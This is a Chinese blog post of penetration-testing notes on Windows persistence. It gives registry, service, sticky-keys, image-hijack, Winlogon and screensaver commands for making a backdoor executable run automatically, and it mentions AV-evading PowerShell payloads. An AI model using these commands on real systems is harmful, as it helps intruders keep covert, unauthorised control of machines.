【权限维持】Windows&自启动&映像劫持&粘滞键&辅助屏保后门&WinLogon

这篇具有很好参考价值的文章主要介绍了【权限维持】Windows&自启动&映像劫持&粘滞键&辅助屏保后门&WinLogon。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

权限维持-域环境&单机版-自启动

1、自启动路径加载

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

将后门放置该目录,服务器重启即上线
2、自启动服务加载

sc create ServiceTest binPath= C:\shell.exe  start= auto
sc delete ServiceTest

3、自启动注册表加载
-当前用户键值

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 

-服务器键值(需要管理员权限)

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run 

-添加启动项

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\shell.exe"

【权限维持】Windows&自启动&映像劫持&粘滞键&辅助屏保后门&WinLogon
4、计划计时任务
参考前面横向移动

权限维持-域环境&单机版-粘滞键

远程连接时,连按五下shift键可以打开粘滞键
【权限维持】Windows&自启动&映像劫持&粘滞键&辅助屏保后门&WinLogon

系统自带的辅助功能进行替换执行,放大镜,旁白,屏幕键盘等均可。
粘滞键位置:

c:\windows\system32\sethc.exe
move sethc.exe sethc1.exe
copy cmd.exe sethc.exe		本质还是进行程序替换

权限维持-域环境&单机版-映像劫持

测试:执行notepad成cmd

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c calc"

【权限维持】Windows&自启动&映像劫持&粘滞键&辅助屏保后门&WinLogon

配合GlobalFlag隐藏:执行正常关闭后触发

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\shell.exe"

33::18

权限维持-域环境&单机版-屏保&登录

1、WinLogon配合无文件落地上线(切换用户登录就会上线)

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "userinit,C:\shell.exe"

【权限维持】Windows&自启动&映像劫持&粘滞键&辅助屏保后门&WinLogon
配合powershell payload(需免杀)实现无文件落地
【权限维持】Windows&自启动&映像劫持&粘滞键&辅助屏保后门&WinLogon

2、屏幕保护生效后执行后门文章来源地址https://www.toymoban.com/news/detail-469068.html

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\shell.exe" /f

到了这里,关于【权限维持】Windows&自启动&映像劫持&粘滞键&辅助屏保后门&WinLogon的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • windows权限维持—SSP&HOOK&DSRM&SIDhistory&SkeletonKey

      在内网中权限维持是非常重要的一部分,很多的时候再拿下一台服务器的时候,如果没做权限维持,可能今天你还能登陆或者访问,明天你就无法访问了,当然也不排除存在那些服务器常年没人管的情况,像这类的服务器基本上都是存在一些小企业,只要服务器正常运行

    2024年02月12日
    浏览(38)
  • C#/WPF 设置和启动Windows屏保程序

    前言         我们平时电脑启动的屏保程序其本质也是应用程序,只是后缀名为.scr。所以我们只需要把应用程序后缀改为.scr,然后右键选择安装即可启动我们自己的屏保程序。 屏保注册表参数         设置电脑屏保参数,在个性化设置锁屏界面屏幕保护程序设置进行调节

    2024年01月18日
    浏览(35)
  • 提权 - Windows 烂土豆/ dll劫持 /服务权限

    烂土豆结合令牌窃取进行提权,WEB权限提权到system权限。 1.原理 1.欺骗“NT AUTHORITYSYSTEM”账户通过NTLM认证到控制的TCP终端 2.对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITYSYSTEM”账户本地协商一个安全令牌。这个过程通过一系列的Windows API调用实现的。 3.模仿这

    2024年01月19日
    浏览(58)
  • 【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限

    1、具体有哪些权限需要我们了解掌握的? 后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等 2、以上常见权限获取方法简要归类说明? 后台权限:SQL注入 , 数据库备份泄露,默认或弱口令等获取帐号密码进入 网站权限:后台提升至网站权限,RCE或文件操

    2024年02月10日
    浏览(47)
  • 黄金票据权限维持

    目录 黄金票据权限维持 一、Krbtgt账户介绍 二、黄金票据原理 三、实验前提 四、实验步骤 krbtgt用户,是系统在创建域时自动生成的一个帐号,其作用是密钥分发中心的服务账号,其密码是系统随机生成 的,无法登录主机。 TGT=Krbtgt的NTLM哈希加密 1、Kerberos中的TGT和Logon Sess

    2024年02月09日
    浏览(48)
  • 内网权限维持

    经测试schtasks计划任务后门只能执行一个,不能触发多个,在目标服务器上没有杀毒软件时可以不做免杀,有杀毒软件的情况下静态和动态免杀都要及格才可以正常执行 介绍: 计划任务在 Windows7及之前版本的操作系统中使用at命令调用,在从 Windows8版本开始的操作系统中使用

    2024年02月06日
    浏览(46)
  • 影子账户——权限维持

    定义 拥有管理员权限,但除了注册表外均查不到的账户。 创建 1、以管理员身份打开命令提示符 2、创建隐藏用户 3、将隐藏用户添加到管理员组 查看一下,没有显示匿名用户 4、查看《本地用户和组》,我是家庭版Windows,没有找到 试了用管理员身份打开也没有 原因如下 可

    2023年04月21日
    浏览(34)
  • 权限维持:常用后门

    郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 配合 Windows 提权文章 windows 系统下连续按 5 次 shift 可调

    2024年02月05日
    浏览(47)
  • Linux中的shell外壳与权限(包含目录文件的权限,粘滞位的来龙去脉)

    Linux严格意义上说的是一个操作系统,我们称之为\\\"核心(kernel)\\\", 但我们一般用户,不能直接使用kernel。 而是通过kernel的“外壳”程序,也就是所谓的shell,来与kernel沟通。 操作系统本身是需要易用程度和安全性的 而对于我们使用电脑的普通用户来说,我们是不能直接访问

    2024年02月08日
    浏览(50)
  • 巧用OpenSSH进行域内权限维持

    最近在Windows服务器上安装OpenSSH,意外发现了一个很有意思的技巧,可用来做域内权限维持,废话不多说,直接上步骤。 01、利用方式 (1)在已经获得权限的Windows服务器上,使用msiexec安装openssh,一行命令静默安装,不需要任何设置。 (2)在默认安装的情况下,配置文件:

    2024年02月06日
    浏览(46)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包